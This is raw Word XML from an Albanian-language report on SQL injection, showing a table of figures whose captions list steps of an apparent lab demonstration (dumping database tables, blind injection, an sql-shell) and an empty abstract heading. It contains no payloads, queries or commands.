          </w:rPr>
          <w:t>Figura 3 Mjedisi i cili është i cenushëm ndaj sql injection</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc91427373 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>10</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="56C34835" w14:textId="37CA1871" w:rsidR="00BF613E" w:rsidRDefault="00BF613E">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9690"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc91427374" w:history="1">
        <w:r w:rsidRPr="006B2515">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figura 4 Përcjellja e requestit përmes Developer Tools</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc91427374 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>11</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1CB600BB" w14:textId="10A2DFB6" w:rsidR="00BF613E" w:rsidRDefault="00BF613E">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9690"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc91427375" w:history="1">
        <w:r w:rsidRPr="006B2515">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figura 5 Printimi i tabelave të databazave pas injektimit</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc91427375 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>12</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0D46D9DB" w14:textId="759B8F46" w:rsidR="00BF613E" w:rsidRDefault="00BF613E">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9690"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc91427376" w:history="1">
        <w:r w:rsidRPr="006B2515">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figura 6 Printimi i skemës së databazës</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc91427376 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>13</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="72206AD1" w14:textId="69575123" w:rsidR="00BF613E" w:rsidRDefault="00BF613E">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9690"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc91427377" w:history="1">
        <w:r w:rsidRPr="006B2515">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figura 7 Printimi i skemës së tabelës users</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc91427377 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>14</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="60AEBFF9" w14:textId="0748DD12" w:rsidR="00BF613E" w:rsidRDefault="00BF613E">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9690"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc91427378" w:history="1">
        <w:r w:rsidRPr="006B2515">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figura 8 Printimi i të dhënave të tabelës users</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc91427378 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>15</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2B078A9A" w14:textId="68AF6F7C" w:rsidR="00BF613E" w:rsidRDefault="00BF613E">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9690"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc91427379" w:history="1">
        <w:r w:rsidRPr="006B2515">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figura 9 Tentimi jo i sukseshëm për dëshifrimin e fjalëkalimeve</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc91427379 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>16</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5B5CF2F0" w14:textId="1A37E6C1" w:rsidR="00BF613E" w:rsidRDefault="00BF613E">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9690"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc91427380" w:history="1">
        <w:r w:rsidRPr="006B2515">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figura 10 Forma për blind sql injection</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc91427380 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>17</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="17E0B57C" w14:textId="5356AE53" w:rsidR="00BF613E" w:rsidRDefault="00BF613E">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9690"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc91427381" w:history="1">
        <w:r w:rsidRPr="006B2515">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figura 11 Analiza e kërkesës POST BSI</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc91427381 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>18</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="229F16C9" w14:textId="6025DB39" w:rsidR="00BF613E" w:rsidRDefault="00BF613E">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9690"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc91427382" w:history="1">
        <w:r w:rsidRPr="006B2515">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figura 12 Printimi i emrave të databazave BSI</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc91427382 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>19</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4C39F476" w14:textId="68B16C8C" w:rsidR="00BF613E" w:rsidRDefault="00BF613E">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9690"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc91427383" w:history="1">
        <w:r w:rsidRPr="006B2515">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figura 13 Printimi i tabelave BSI</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc91427383 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>20</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="66642BBB" w14:textId="0E7934E2" w:rsidR="00BF613E" w:rsidRDefault="00BF613E">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9690"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc91427384" w:history="1">
        <w:r w:rsidRPr="006B2515">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figura 14 Printimi i të dhënave të tabelës users BSI</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc91427384 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>21</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2BEE8F1C" w14:textId="45C50167" w:rsidR="00BF613E" w:rsidRDefault="00BF613E">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9690"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc91427385" w:history="1">
        <w:r w:rsidRPr="006B2515">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figura 15 Rezulatet e ekzekutimit të custom query</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc91427385 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>22</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="79F4E768" w14:textId="37E8190C" w:rsidR="00BF613E" w:rsidRDefault="00BF613E">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9690"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc91427386" w:history="1">
        <w:r w:rsidRPr="006B2515">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figura 16 Krijimi  i sql-she</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>l</w:t>
        </w:r>
        <w:r w:rsidRPr="006B2515">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>l</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc91427386 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>23</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="435E7080" w14:textId="710CE125" w:rsidR="00BF613E" w:rsidRDefault="00BF613E">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9690"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc91427387" w:history="1">
        <w:r w:rsidRPr="006B2515">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figura 17 Ekzekutimi i queries përmes sql-shell</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc91427387 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>23</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="190EB1BF" w14:textId="46E10E7D" w:rsidR="00BF613E" w:rsidRDefault="00BF613E">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9690"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc91427388" w:history="1">
        <w:r w:rsidRPr="006B2515">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figura 18 Printimi i databazës aktuale</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc91427388 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>24</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="63C5BEA8" w14:textId="7FC8608E" w:rsidR="00BF613E" w:rsidRDefault="00BF613E">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9690"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc91427389" w:history="1">
        <w:r w:rsidRPr="006B2515">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figura 19 Printimi i userit aktual të databazës</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc91427389 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>25</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6F601B97" w14:textId="34301DCE" w:rsidR="00C25634" w:rsidRDefault="00BF613E">
      <w:pPr>
        <w:sectPr w:rsidR="00C25634">
          <w:headerReference w:type="default" r:id="rId10"/>
          <w:footerReference w:type="default" r:id="rId11"/>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="1380" w:right="1320" w:bottom="920" w:left="1220" w:header="727" w:footer="739" w:gutter="0"/>
          <w:pgNumType w:start="2"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE2A216" w14:textId="7A7124B1" w:rsidR="0003327A" w:rsidRPr="0003327A" w:rsidRDefault="003B7A3C" w:rsidP="0003327A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="300"/>
        <w:ind w:left="940" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="2E74B4"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_TOC_250005"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:color w:val="2E74B4"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Abstrakti</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DAF0E43" w14:textId="77777777" w:rsidR="0003327A" w:rsidRDefault="0003327A" w:rsidP="000C31F5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
